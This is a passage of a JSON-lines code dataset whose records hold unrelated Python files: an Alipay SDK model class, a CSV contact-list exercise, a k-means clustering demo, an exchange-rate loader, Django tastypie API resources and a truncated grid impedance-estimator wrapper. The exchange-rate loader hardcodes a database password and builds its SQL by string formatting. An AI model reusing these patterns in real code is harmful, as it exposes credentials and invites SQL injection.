*\nfrom alipay.aop.api.domain.IotDevicePrincipal import IotDevicePrincipal\n\n\nclass AlipayCommerceIotMdeviceprodDeviceBindModel(object):\n\n def __init__(self):\n self._biz_tid = None\n self._device_sn = None\n self._ext_info = None\n self._identify_type = None\n self._principal = None\n self._supplier_id = None\n\n @property\n def biz_tid(self):\n return self._biz_tid\n\n @biz_tid.setter\n def biz_tid(self, value):\n self._biz_tid = value\n @property\n def device_sn(self):\n return self._device_sn\n\n @device_sn.setter\n def device_sn(self, value):\n self._device_sn = value\n @property\n def ext_info(self):\n return self._ext_info\n\n @ext_info.setter\n def ext_info(self, value):\n self._ext_info = value\n @property\n def identify_type(self):\n return self._identify_type\n\n @identify_type.setter\n def identify_type(self, value):\n self._identify_type = value\n @property\n def principal(self):\n return self._principal\n\n @principal.setter\n def principal(self, value):\n if 
isinstance(value, list):\n            self._principal = list()\n            for i in value:\n                if isinstance(i, IotDevicePrincipal):\n                    self._principal.append(i)\n                else:\n                    self._principal.append(IotDevicePrincipal.from_alipay_dict(i))\n    @property\n    def supplier_id(self):\n        return self._supplier_id\n\n    @supplier_id.setter\n    def supplier_id(self, value):\n        self._supplier_id = value\n\n\n    def to_alipay_dict(self):\n        params = dict()\n        if self.biz_tid:\n            if hasattr(self.biz_tid, 'to_alipay_dict'):\n                params['biz_tid'] = self.biz_tid.to_alipay_dict()\n            else:\n                params['biz_tid'] = self.biz_tid\n        if self.device_sn:\n            if hasattr(self.device_sn, 'to_alipay_dict'):\n                params['device_sn'] = self.device_sn.to_alipay_dict()\n            else:\n                params['device_sn'] = self.device_sn\n        if self.ext_info:\n            if hasattr(self.ext_info, 'to_alipay_dict'):\n                params['ext_info'] = self.ext_info.to_alipay_dict()\n            else:\n                params['ext_info'] = self.ext_info\n        if self.identify_type:\n            if hasattr(self.identify_type, 'to_alipay_dict'):\n                params['identify_type'] = self.identify_type.to_alipay_dict()\n            else:\n                params['identify_type'] = self.identify_type\n        if self.principal:\n            if isinstance(self.principal, list):\n                for i in range(0, len(self.principal)):\n                    element = self.principal[i]\n                    if hasattr(element, 'to_alipay_dict'):\n                        self.principal[i] = element.to_alipay_dict()\n            if hasattr(self.principal, 'to_alipay_dict'):\n                params['principal'] = self.principal.to_alipay_dict()\n            else:\n                params['principal'] = self.principal\n        if self.supplier_id:\n            if hasattr(self.supplier_id, 'to_alipay_dict'):\n                params['supplier_id'] = self.supplier_id.to_alipay_dict()\n            else:\n                params['supplier_id'] = self.supplier_id\n        return params\n\n    @staticmethod\n    def from_alipay_dict(d):\n        if not d:\n            return None\n        o = AlipayCommerceIotMdeviceprodDeviceBindModel()\n        if 'biz_tid' in d:\n            o.biz_tid = d['biz_tid']\n        if 'device_sn' in d:\n            o.device_sn = d['device_sn']\n        if 'ext_info' in d:\n            o.ext_info = d['ext_info']\n        if 'identify_type' in d:\n            o.identify_type = d['identify_type']\n        if 'principal' in d:\n            o.principal = d['principal']\n        if 'supplier_id' in d:\n            o.supplier_id = d['supplier_id']\n        return o\n\n\n","sub_path":"alipay/aop/api/domain/AlipayCommerceIotMdeviceprodDeviceBindModel.py","file_name":"AlipayCommerceIotMdeviceprodDeviceBindModel.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"416679700","text":"\"\"\"\n1. Save to a CSV file\n2. Read from a CSV file\n3. Print the current contents to the console\n4. Design the contact list\n\nMember info:\nname/phone number/home address/registration date/\n\"\"\"\n\nimport datetime\nimport csv\n\n\ndef writeCSV(database):\n    CSV_PATH = './hw01/data_new.csv'\n    # The with-statement closes the file on exit, so no extra try/finally is needed.\n    with open(CSV_PATH, 'w', newline='') as datafile:\n        fieldnames = ['id','name','phone_number','address','created_at','is_member']\n        writer = csv.DictWriter(datafile, fieldnames=fieldnames)\n        writer.writeheader()\n        for i in database:\n            writer.writerow(\n                {\n                    'id': i.id,\n                    'name': i.name,\n                    'phone_number': i.phone_number,\n                    'address': i.address,\n                    'created_at': i.created_at if i.created_at else datetime.date.today(),\n                    'is_member': i.is_member\n                }\n            )\n\n\ndef getCSV(database):\n    CSV_PATH = './hw01/data.csv'\n    # As above, the context manager handles closing the file.\n    with open(CSV_PATH) as datafile:\n        reader = csv.DictReader(datafile)\n        for row in reader:\n            member = Member(\n                row['id'].strip(),\n                row['name'].strip(),\n                row['phone_number'].strip(),\n                row['address'].strip(),\n                row['created_at'].strip() if row['created_at'].strip() else datetime.date.today(),\n                True if row['is_member'].strip() == '1' else False\n            )\n            database.append(member)\n\n\ndef showDatabase(database):\n    for i in database:\n        print(i.id, i.name, i.phone_number, i.address, i.created_at, i.is_member)\n\n\nmember_database = []\n\n\nclass Member:\n    def __init__(self, id, name, phone_number, address, created_at, is_member=True):\n        self.id = id\n        self.name = name\n        self.phone_number = phone_number\n        self.address = address\n        self.created_at = created_at\n        self.is_member = is_member\n\n\ngetCSV(member_database)\nwriteCSV(member_database)\nshowDatabase(member_database)\n\n\n","sub_path":"hw01/hw_01.py","file_name":"hw_01.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"290599580","text":"from pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.cluster import KMeans\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\nclass KmeanAlgorithm(object):\n    @staticmethod\n    def read_data():\n        root = Path(__file__).parent.parent.parent.parent\n        df = pd.read_csv(str(root) + \"/data/user.csv\")\n        df.head()\n\n        return df\n\n    @staticmethod\n    def show_age_fregquency(df):\n        plt.figure(figsize=(10, 6))\n        plt.title('ages frequency')\n        sns.axes_style('dark')\n        sns.violinplot(y=df['age'])\n        plt.show()\n\n    @staticmethod\n    def show_spendingscore_salary_frequency(df):\n        plt.figure(figsize=(25, 10))\n        plt.subplot(1, 2, 1)\n        sns.boxplot(y=df[\"spending_score\"], color=\"yellow\")\n        plt.subplot(1, 2, 2)\n        sns.boxplot(y=df[\"salary\"])\n        plt.show()\n\n    @staticmethod\n    def show_gender_frequency(df):\n        genders = df.gender.value_counts()\n        sns.set_style(\"darkgrid\")\n        plt.figure(figsize=(20, 14))\n        sns.barplot(x=genders.index, y=genders.values)\n        plt.show()\n\n    @staticmethod\n    def show_age_count(df):\n        age18_25 = df.age[(df.age <= 25) & (df.age >= 18)]\n        age26_35 = df.age[(df.age <= 35) & (df.age >= 26)]\n        age36_45 = df.age[(df.age <= 45) & (df.age >= 36)]\n        age46_55 = df.age[(df.age <= 55) & (df.age >= 46)]\n        age55above = df.age[df.age >= 56]\n\n        x = [\"18-25\", \"26-35\", \"36-45\", \"46-55\", \"55+\"]\n        y = [len(age18_25.values), len(age26_35.values), len(age36_45.values), len(age46_55.values),\n             len(age55above.values)]\n\n        plt.figure(figsize=(25, 16))\n        sns.barplot(x=x, y=y, palette=\"rocket\")\n        plt.title(\"number of customer and ages\")\n        plt.xlabel(\"age\")\n        plt.ylabel(\"number of customer\")\n        plt.show()\n\n    @staticmethod\n    def 
show_spending_score_count(df):\n ss1_20 = df[\"spending_score\"][\n (df[\"spending_score\"] >= 1) & (df[\"spending_score\"] <= 20)]\n ss21_40 = df[\"spending_score\"][\n (df[\"spending_score\"] >= 21) & (df[\"spending_score\"] <= 40)]\n ss41_60 = df[\"spending_score\"][\n (df[\"spending_score\"] >= 41) & (df[\"spending_score\"] <= 60)]\n ss61_80 = df[\"spending_score\"][\n (df[\"spending_score\"] >= 61) & (df[\"spending_score\"] <= 80)]\n ss81_100 = df[\"spending_score\"][\n (df[\"spending_score\"] >= 81) & (df[\"spending_score\"] <= 100)]\n\n ssx = [\"1-20\", \"21-40\", \"41-60\", \"61-80\", \"81-100\"]\n ssy = [len(ss1_20.values), len(ss21_40.values), len(ss41_60.values), len(ss61_80.values), len(ss81_100.values)]\n\n plt.figure(figsize=(20, 10))\n sns.barplot(x=ssx, y=ssy, palette=\"nipy_spectral_r\")\n plt.title(\"Spending Scores\")\n plt.xlabel(\"Score\")\n plt.ylabel(\"Number of Customer Having the Score\")\n plt.show()\n\n @staticmethod\n def show_salary_count(df):\n sl0_30 = df[\"salary\"][(df[\"salary\"] >= 0) & (df[\"salary\"] <= 30)]\n sl31_60 = df[\"salary\"][(df[\"salary\"] >= 31) & (df[\"salary\"] <= 60)]\n sl61_90 = df[\"salary\"][(df[\"salary\"] >= 61) & (df[\"salary\"] <= 90)]\n sl91_120 = df[\"salary\"][(df[\"salary\"] >= 91) & (df[\"salary\"] <= 120)]\n sl121_150 = df[\"salary\"][(df[\"salary\"] >= 121) & (df[\"salary\"] <= 150)]\n\n slx = [\"$ 0 - 30,000\", \"$ 30,001 - 60,000\", \"$ 60,001 - 90,000\", \"$ 90,001 - 120,000\", \"$ 120,001 - 150,000\"]\n sly = [len(sl0_30.values), len(sl31_60.values), len(sl61_90.values), len(sl91_120.values),\n len(sl121_150.values)]\n\n plt.figure(figsize=(15, 6))\n sns.barplot(x=slx, y=sly, palette=\"Set2\")\n plt.title(\"salary\")\n plt.xlabel(\"results\")\n plt.ylabel(\"number of user\")\n plt.show()\n\n @staticmethod\n def kmean_clustering(df):\n km = KMeans(n_clusters=5)\n clusters = km.fit_predict(df.iloc[:, 2:])\n df[\"label\"] = clusters\n return df\n\n @staticmethod\n def show_kmean_clustering(df):\n df = KmeanAlgorithm().kmean_clustering(df)\n fig = plt.figure(figsize=(20, 13))\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(df.age[df.label == 0], df[\"salary\"][df.label == 0],\n df[\"spending_score\"][df.label == 0], c='yellow', s=80)\n ax.scatter(df.age[df.label == 1], df[\"salary\"][df.label == 1],\n df[\"spending_score\"][df.label == 1], c='red', s=80)\n ax.scatter(df.age[df.label == 2], df[\"salary\"][df.label == 2],\n df[\"spending_score\"][df.label == 2], c='green', s=80)\n ax.scatter(df.age[df.label == 3], df[\"salary\"][df.label == 3],\n df[\"spending_score\"][df.label == 3], c='black', s=80)\n ax.scatter(df.age[df.label == 4], df[\"salary\"][df.label == 4],\n df[\"spending_score\"][df.label == 4], c='blue', s=80)\n ax.view_init(30, 185)\n plt.xlabel(\"age\")\n plt.ylabel(\"salary\")\n ax.set_zlabel('spending score (1-100)')\n plt.show()\n\n\n# Show demo\nif __name__ == '__main__':\n df = KmeanAlgorithm().read_data()\n\n KmeanAlgorithm().show_age_fregquency(df)\n KmeanAlgorithm().show_spendingscore_salary_frequency(df)\n KmeanAlgorithm().show_gender_frequency(df)\n KmeanAlgorithm().show_age_count(df)\n KmeanAlgorithm().show_spending_score_count(df)\n KmeanAlgorithm().show_salary_count(df)\n KmeanAlgorithm().show_kmean_clustering(df)\n","sub_path":"clustering-users-kmeans/com/dimageshare/algorithm/kmean_algorithm.py","file_name":"kmean_algorithm.py","file_ext":"py","file_size_in_byte":5468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} 
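The kmean_clustering method in the record above hardcodes n_clusters=5; the elbow method is a common way to sanity-check that choice. A minimal, self-contained sketch follows (the synthetic blobs are illustrative stand-ins for df.iloc[:, 2:], not the project's data):

# Elbow-method sketch: fit KMeans over a range of k and look for the bend in
# the inertia curve (within-cluster sum of squares) to pick n_clusters.
import numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans

# Three well-separated synthetic blobs stand in for (age, salary, spending_score).
rng = np.random.default_rng(0)
X = np.vstack([rng.normal(loc=c, scale=0.5, size=(50, 3)) for c in (0.0, 3.0, 6.0)])

ks = range(1, 11)
inertias = [KMeans(n_clusters=k, n_init=10, random_state=0).fit(X).inertia_ for k in ks]

# The "elbow" where the curve flattens suggests a reasonable cluster count.
plt.plot(list(ks), inertias, marker='o')
plt.xlabel('number of clusters k')
plt.ylabel('inertia (within-cluster sum of squares)')
plt.show()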
+{"seq_id":"316160325","text":"import json\nimport pymysql\nimport os\nfrom datetime import datetime\n\nUSD_CAD_RATE_KEY = \"FXUSDCAD\"\n\ndef get_db_params_from_env():\n return {\n 'host': os.environ.get('DB_HOST') or 'localhost',\n 'port': os.environ.get('DB_PORT') or 3306,\n 'db': os.environ.get('DB_NAME'),\n 'user': os.environ.get('DB_USERNAME') or 'admin',\n 'passwd': os.environ.get('DB_PASSWORD')\n }\n\ndef get_db_conn():\n db_params = get_db_params_from_env()\n return pymysql.connect(**db_params) \n\ndef load_file(filepath, conn):\n file = open(filepath, \"r\")\n p = file.read()\n j = json.loads(p)\n with conn.cursor() as cur:\n for o in j['observations']:\n insert_obs_in_db(cur, o)\n conn.commit()\n\n\ndef insert_obs_in_db(cur, obs):\n date = obs['d']\n rate = obs[USD_CAD_RATE_KEY][\"v\"]\n sql = (\n \"INSERT INTO exchange_rate (date, from_curr, to_curr, type, rate) \"\n \"VALUES ('{date}', 'USD', 'CAD', 'Noon', {rate})\"\n )\n cur.execute(sql.format(\n date=date,\n rate=rate\n )\n )\n \n\nif __name__ == \"__main__\":\n os.environ['DB_NAME'] = \"investornetwork\"\n os.environ['DB_PASSWORD'] = \"irondesk89\"\n conn = get_db_conn()\n load_file(\"./FX_RATES_DAILY-sd-2017-01-03.json\", conn)\n\n","sub_path":"chalicelib/load_bankofcanada_rates.py","file_name":"load_bankofcanada_rates.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"644941083","text":"from django.contrib.sessions.models import Session\nfrom django.contrib.auth.models import User\nfrom django.conf.urls import url\nfrom django.core.exceptions import MultipleObjectsReturned\nfrom django.core.management import call_command\n\nfrom tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS\nfrom tastypie.authorization import Authorization\nfrom tastypie.authentication import BasicAuthentication\nfrom tastypie.authorization import DjangoAuthorization\nfrom tastypie import fields\n\nfrom api.defaults import DEFAULT_BLACKLIST\nfrom accounts.models import UserProfile\nfrom api.models import *\nfrom resource_helpers import *\n\nfrom common.templatetags.filters import url_domain\n\nclass MyBasicAuthentication(BasicAuthentication):\n def __init__(self, *args, **kwargs):\n super(MyBasicAuthentication, self).__init__(*args, **kwargs)\n\n def is_authenticated(self, request, **kwargs):\n if 'sessionid' in request.COOKIES:\n s = Session.objects.filter(pk=request.COOKIES['sessionid'])\n if s.exists():\n s = s[0]\n if '_auth_user_id' in s.get_decoded():\n u = User.objects.get(id=s.get_decoded()['_auth_user_id'])\n request.user = u\n return True \n return False\n\nclass BaseMeta:\n \"\"\"\n Abstract class to get basic authentication and authorization.\n \"\"\"\n authentication = MyBasicAuthentication()\n authorization = DjangoAuthorization()\n serializer = urlencodeSerializer()\n\nclass BaseResource(ModelResource):\n \"\"\"\n Subclass this to get generic ModelResource add-ins that TastyPie doesn't supply.\n \"\"\"\n def apply_authorization_limits(self, request, object_list):\n return object_list.filter(user=request.user) \n\nclass UserResource(ModelResource):\n\n def override_urls(self):\n return [\n url(r\"^(?P%s)/(?P[\\w\\d_.-]+)/$\" % self._meta.resource_name, self.wrap_view('dispatch_detail'), name=\"api_dispatch_detail\"),\n ]\n\n class Meta(BaseMeta):\n queryset = User.objects.all()\n resource_name = 'user'\n \n detail_allowed_methods = ['get']\n list_allowed_methods = []\n fields = ['username', 'first_name', 'last_name', 
'last_login']\n\n filtering = {\n 'username': ALL,\n }\n\nclass UserProfileResource(ModelResource):\n\n user = fields.ForeignKey(UserResource, 'user')\n\n class Meta(BaseMeta):\n queryset = UserProfile.objects.all()\n resource_name = 'user_profile'\n\n detail_allowed_methods = ['get']\n list_allowed_methods = []\n fields = ['pic_url']\n filtering = {\n 'user' : ALL_WITH_RELATIONS\n }\n\nclass FilterSetItemResource(BaseResource):\n \"\"\"\n Abstract base class\n \"\"\"\n user = fields.ForeignKey(UserResource, 'user') \n \n class Meta(BaseMeta):\n\n detail_allowed_methods = ['get', 'post', 'put', 'delete']\n filtering = {\n 'user': ALL_WITH_RELATIONS,\n 'date_created': ALL,\n 'url' : ALL,\n }\n resource_name = 'filterset'\n\n\nclass WhiteListItemResource(FilterSetItemResource):\n\n def obj_create(self, bundle, request=None, **kwargs):\n url = bundle.data['url']\n \n blacklist_item = get_BlackListItem(url) #check to see if this exists\n if blacklist_item:\n blacklist_item.delete()\n\n #do not create if it is a default blacklist url\n if url in DEFAULT_BLACKLIST:\n return bundle\n\n try:\n obj = WhiteListItem.objects.get(user=request.user, url=url)\n except WhiteListItem.DoesNotExist:\n return super(WhiteListItemResource, self).obj_create(bundle, request, user=request.user, **kwargs)\n except MultipleObjectsReturned: \n #multiple items created, delete duplicates\n call_command(\"remove_duplicate_filtersets\")\n return bundle\n\n class Meta(FilterSetItemResource.Meta):\n\n queryset = WhiteListItem.objects.select_related().all()\n resource_name = 'whitelist'\n\nclass BlackListItemResource(FilterSetItemResource):\n \n def obj_create(self, bundle, request=None, **kwargs):\n\n url = bundle.data['url']\n\n whitelist_item = get_WhiteListItem(url) #check to see if this exists\n if whitelist_item:\n whitelist_item.delete()\n try:\n obj = BlackListItem.objects.get(user=request.user, url=url)\n except BlackListItem.DoesNotExist:\n return super(BlackListItemResource, self).obj_create(bundle, request, user=request.user, **kwargs) \n except MultipleObjectsReturned:\n #multiple items created, delete duplicates\n call_command(\"remove_duplicate_filtersets\")\n return bundle\n\n class Meta(FilterSetItemResource.Meta):\n\n queryset = BlackListItem.objects.select_related().all()\n resource_name = 'blacklist'\n\n\nclass EyeHistoryResource(BaseResource):\n user = fields.ForeignKey(UserResource, 'user')\n\n class Meta(BaseMeta):\n queryset = EyeHistory.objects.select_related().all()\n resource_name = 'history-data'\n\n list_allowed_methods = ['get', 'post']\n detail_allowed_methods = ['get', 'post', 'put', 'delete']\n filtering = {\n 'user': ALL_WITH_RELATIONS,\n 'url' : ALL,\n 'title' : ALL,\n 'start_time' : ALL,\n 'end_time' : ALL,\n 'total_time' : ALL,\n }\n\n def obj_create(self, bundle, request=None, **kwargs):\n url = bundle.data['url']\n domain = url_domain(url)\n \n bundle.data[\"domain\"] = domain\n\n title = bundle.data['title']\n total_time = bundle.data['total_time']\n src = bundle.data['src']\n \n if not in_Whitelist(url):\n return bundle\n \n try:\n obj = EyeHistory.objects.get(user=request.user, url=url, domain=domain, title=title, total_time=total_time, src=src)\n \n except EyeHistory.DoesNotExist:\n return super(EyeHistoryResource, self).obj_create(bundle, request, user=request.user, **kwargs)\n\n except MultipleObjectsReturned:\n #multiple items created, delete duplicates\n call_command(\"remove_duplicate_history\")\n \n return 
bundle\n","sub_path":"api/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":6369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"388059198","text":"\n\nfrom pyxbos.process import run_loop, config_from_file #https://github.com/gtfierro/xboswave/blob/master/python/pyxbos/pyxbos/process.py\nfrom pyxbos.drivers import pbc #https://github.com/gtfierro/xboswave/tree/master/python/pyxbos/pyxbos/drivers\n# above imports LPBCProcess, SPBCProcess, EnergiseMessage, LPBCStatus, LPBCCommand, SPBC, EnergiseError\nimport sys\nimport matplotlib.pyplot as plt\nimport os #HERE for saving plots\nimport asyncio #for getting the loop\n#from pathlib import Path # https://medium.com/@ageitgey/python-3-quick-tip-the-easy-way-to-deal-with-file-paths-on-windows-mac-and-linux-11a072b58d5f\nimport numpy as np\nimport pandas as pd\nimport time as pytime\nimport warnings\nimport logging\nimport requests\nfrom requests_futures.sessions import FuturesSession\nfrom pymodbus.client.sync import ModbusTcpClient as ModbusClient\nimport configparser\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nlogging.basicConfig(level=\"INFO\", format='%(asctime)s - %(name)s - %(message)s')\n\n# from PIcontroller import *\n# from LQRcontroller import *\nfrom Zestimator import *\n\n\n'''\nZestimator Assumptions:\n- P and Q commands are implemented for the entire time during which the estimation is max_degrees.\n (this will create issues if the P and Q commands arent recieved immediately)\n\nFlexlab comands and measurements:\nPMU measures positive INTO the battery for both P and Q (inverter looks like an inductor for positive Q measurent)\nInverter Pmax limiting is ambigious to direction\nInverter power factor commands are for Q only, defined positive for reactive power into the network, or OUT of the battery (this is the oppposite of how the PMU measures it)\n\nChanges made for flexlab convention:\nDid not change anything within PQcalc or phasorI_calc\nDid switch the sign of self.Icomp_pu, which is fed into the impedance estimator only\nDid not switch the sign of Pact and Qact (which are positive out of network), or Pcmd and Qcmd (which are positive into the network)\nSwitched signs of Pact and Qact that are fed into check saturation and ICDI (which still communicates to SPBC using postive into network convention)\ninverters are positive P out of the network for batt commands (positive P into the network for inverter-limiting commands)\ninverters are positive Q into the netowk (because of how PF is calculated)\nload_cmd is still postive into the network (for just P)\nmodbus is positive out of the network (switched internally)\n'''\n\n\n#to use session.get for parallel API commands you have to download futures: pip install --user requests-futures\n\nclass Zestwrapper(pbc.LPBCProcess): #this is related to super(), inherits attributes and behaviors from pbc.LPBCProcess (which is a wrapper for XBOSProcess)\n def __init__(self, cfg, busId, testcase, nphases, act_idxs, actType, plug_to_phase_idx, timesteplength, currentMeasExists, kVbase, network_kVAbase, localSratio=1, localVratio=1, ORT_max_kVA=500, VmagScaling=1, Zeffk_init_mult='None'):#, loop='None'):\n super().__init__(cfg) #cfg goes to LPBCProcess https://github.com/gtfierro/xboswave/blob/master/python/pyxbos/pyxbos/drivers/pbc/pbc_framework.py\n\n # self.loop = loop\n print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')\n print(f'Building LPBC for 
performance node {busId}')\n self.busId = busId\n self.timesteplength = timesteplength\n\n #These are new #HEREE\n # self.useRefNodeforVcalc = True\n self.useRefNodeforVcalc = False\n useV0forVth = False\n useNominalVforPsi = True\n # self.Vang_fict = None #not using these any more\n # self.max_delta_ang = 20 #(degrees)\n self.measurementFreq = 120 #how many measurements the PMU produces in a second\n self.nomFreq = 60 #the nominal frequency used by PMUs for the synchrophasor measurements\n self.freqTol = self.nomFreq*.001 #arbitrary\n\n # self.baseP_pu = 0\n # self.baseQ_pu = 0\n # self.baseP_pu = .1\n # self.baseQ_pu = .1\n # # self.perturbPowerCommand = 0\n # # self.perturbScale = .1\n # self.perturbScale = 1\n\n self.baseP_pu = 1\n self.baseQ_pu = self.baseP_pu\n # self.perturbScale = .005\n self.perturbScale = .01\n # self.perturbScale = 0\n # self.Pcmd_pu = (np.ones(self.nphases) + np.random.randn(self.nphases)*self.perturbScale) * self.baseP_pu\n\n '''\n Zestimation:\n current that is measured is based on localSbase, not networkSbase\n so the current measurement used to estimate Z should use localSbase\n (current meas has not accounted for inverter offset hack to reduce oscillations)\n '''\n # self.usingNonpuZeff = 0 #setting this to 0 loads the saved pu Zeffk, to 1 loads the non pu Zeffk and waits for the first SPBC target to set the pu Zeffk\n # self.ZeffkestinitHasNotBeenInitialized = 1 #only useful if self.usingNonpuZeff = 1, necessary bc KVA base is not received until first packet is received from the SPBC\n # if self.usingNonpuZeff:\n # ZeffkinitInPU = 0\n # Zeffkpath = 'networkImpedanceModels/Zeffks/' + str(testcase) + '/notPU' + '/Zeffk_bus' + str(busId) + '.csv' #alternative\n # # if testcase == 'manual': #HERE for debugging, assumes 13bal is used\n # # Zeffkpath = 'networkImpedanceModels/Zeffks/' + '13bal' + '/notPU' + '/Zeffk_bus' + str(busId) + '.csv' #alternative\n # else:\n # ZeffkinitInPU = 1\n Zeffkpath = 'networkImpedanceModels/Zeffks/' + str(testcase) + '/PU' + '/Zeffk_bus' + str(busId) + '.csv'\n # if testcase == 'manual': #HERE for debugging, assumes 13bal is used\n # Zeffkpath = 'networkImpedanceModels/Zeffks/' + '13bal' + '/PU' + '/Zeffk_bus' + str(busId) + '.csv'\n Zeffk_df = pd.read_csv(Zeffkpath, index_col=0) #index_col=0 bc of how Im saving the df (should have done index = false)\n Zeffk_df = Zeffk_df.apply(lambda col: col.apply(lambda val: complex(val.strip('()')))) #bc data is complex\n Zeffk_init = np.asmatrix(Zeffk_df.values)\n\n #for logging Zeff estimation error\n # self.ZeffkError = []\n # self.GtMag = []\n # if self.usingNonpuZeff == 0:\n self.ZeffkTru = Zeffk_init.copy() #self.ZeffkTru is an attribute of lpbcwrapper rather than the LQR controller bc the LQR doesnt know ZeffkTru (wrapper wouldnt either, in actual implementations)\n print(f'ZeffkTru (PU) bus {busId}: ', self.ZeffkTru)\n #else wait till Zbase is #HERE will assigning a self. 
later create an error?\n\n        self.Zeffkintermed = self.ZeffkTru.copy()\n\n        #for testing the Zeffestimator\n        if not isinstance(Zeffk_init_mult, str) and Zeffk_init_mult < 0: #guard the string defaults ('None', 'uniRandom'): comparing a str with 0 raises a TypeError in Python 3\n            simNum = -Zeffk_init_mult\n            Zeffk_init_mult = 'uniRandom'\n        if Zeffk_init_mult == 'None':\n            Zeffk_init_mult = .5\n            # Zeffk_init_mult = .75\n            # Zeffk_init_mult = 1\n            # Zeffk_init_mult = 1.25\n            # Zeffk_init_mult = 1.5\n            # Zeffk_init_mult = 2\n            self.Zeff_kinit = Zeffk_init*Zeffk_init_mult\n        elif Zeffk_init_mult == 'uniRandom':\n            self.Zeff_kinit = self.ZeffkTru.copy()\n            for i in np.arange(nphases):\n                for k in np.arange(nphases):\n                    self.Zeff_kinit[i,k] = Zeffk_init[i,k]*2*np.random.uniform()\n        else:\n            self.Zeff_kinit = Zeffk_init*Zeffk_init_mult\n        self.Zeffk_init_mult = Zeffk_init_mult\n        print('self.Zeffk_init_mult ', self.Zeffk_init_mult)\n        print(f'Zeffk_init_mult (PU) bus {busId}: ', self.Zeffk_init_mult)\n        print(f'Zeffk_init (PU) bus {busId}: ', self.Zeff_kinit)\n        if Zeffk_init_mult == 'uniRandom':\n            self.initErrString = f'eps=uniRandom{simNum}'\n        else:\n            self.initErrString = f'eps={self.Zeffk_init_mult}'\n        ######################## LQR Controller Parameters #######################\n        #General controller parameters\n        linearizeplant = 1 #determines how the (V-V0) voltage is converted into an eq power injection\n\n        #REIE parameters\n        # lam = .99 # 0 < lam < 1, smaller lam changes state faster (more noise sensitive)\n        lam = .95\n        # lam = .5\n        # GtInitScale = 1\n        GtInitScale = 100\n        # GtInitScale = 1000\n        controllerUpdateCadence = 1 #this is the cadence (of timesteps) with which K is updated\n\n        # Gt = np.asmatrix(np.eye(3))*(1+1j)*GtInitScale\n        Gt = np.asmatrix(np.eye(3))*GtInitScale\n\n        assert nphases == 3, 'LQR controller has only been set up for 3 phases at the moment'\n        # self.useRelativeMeas = 0 #default is 0. setting to 1 runs LQR with relative V measurements rather than nonRelative V measurements (still uses relative Vcomp)\n        # self.estimator = LQRcontroller(busId,nphases,timesteplength,Qcost,Rcost,Zeffk_init,est_Zeffk,cancelDists,currentMeasExists,lpAlpha,lam,Gt,controllerUpdateCadence,linearizeplant,ZeffkinitInPU)\n        self.estimator = Zestimator(busId,nphases,self.Zeff_kinit,useNominalVforPsi,useV0forVth,currentMeasExists,lam,Gt)\n\n        # self.estimatorInitialized = 0 # For LQR: flag to initialize Zest (and set unaive before turning on controller)\n\n        self.ametek_phase_shift = 0 #in degrees\n        self.actType = actType\n\n        self.nphases = nphases\n        self.iteration_counter = 0\n\n        self.Pcmd_kVA = np.zeros(nphases)\n        self.Qcmd_kVA = np.zeros(nphases) #Pcmd comes from the feedback controller\n        self.Pcmd_pu = np.zeros(nphases) #both Pcmd and Pact are in the local power setting (not the amplified OpalRT setting which is just multiplied by localSratio)\n        self.Qcmd_pu = np.zeros(nphases)\n\n        self.Pact_kVA = np.zeros(nphases) #Pactual (measured from pmus, used to calc saturation)\n        self.Qact_kVA = np.zeros(nphases)\n        self.Pact = np.zeros(nphases)\n        self.Qact = np.zeros(nphases)\n        self.Pact_pu = np.zeros(nphases)\n        self.Qact_pu = np.zeros(nphases)\n\n        #all angles should be in radians\n        self.Vang_with120degshifts = np.asarray([np.NaN]*nphases) #The notRelative angles are created by subtracting the angle timestamp for the FIRST phase from ALL the phases, which will give angles separated by ~120degrees.\n        self.Vang_without120degshifts = np.asarray([np.NaN]*nphases) #relative angles have the reference angle (timestamp) for each phase subtracted for each phase, which will NOT give angles separated by ~120degrees.\n        self.Vmag = np.zeros(nphases)\n        self.Vmag_pu = np.zeros(nphases)\n        
self.Vmag_relative = np.zeros(nphases)\n self.Vmag_relative_pu = np.zeros(nphases)\n self.phasor_error_ang = np.zeros(nphases)\n self.phasor_error_mag_pu = np.zeros(nphases)\n self.VmagRef = np.zeros(nphases) #rename these V0mag and V0ang at some point\n self.VmagRef_pu = np.zeros(nphases)\n self.VangRef = np.zeros(nphases)\n\n # #Just need to decide what to call unintialized values (probably np.zero if more than 1 dimension)\n # #Targets received from SPBC, right now VmagTarg as relative not abosolute\n # self.VangTarg_relative = 'initialize' #intialized the first time a phasor_target packet comes from the SPBC, control loop isnt run until a packet is received\n # #VangTarg_relative subtracts the reference nodes angle for each phase from each phase, so the realtive angles are all around 0 (rather than [0, -120, 120])\n # self.VmagTarg_pu = 'initialize' #all angles should be in radians\n # # self.VmagTarg_pu = np.zeros(nphases) #rn SPBC sends targets in relative_pu, so these aren't needed\n # # self.VmagTarg_relative = np.zeros(nphases)\n # self.VmagTarg_relative_pu = np.zeros(nphases)\n self.status_phases = plug_to_phase_idx #no idea if this is correct, just did it to avoid an error\n\n self.localVratio = localVratio #!= 1 if Ametek voltage ratio needs to be taken into account (ie PMU123 not PMUP123 used for the voltage)\n self.localSratio = localSratio #ratio between actual power and power in Opal siulation, eg 500/3.3\n self.ORT_max_VA = ORT_max_kVA * 1000\n #HEREE\n self.kVbase = np.asarray(kVbase)\n self.network_kVAbase = np.asarray(network_kVAbase)\n self.localkVbase = self.kVbase/self.localVratio\n self.localkVAbase 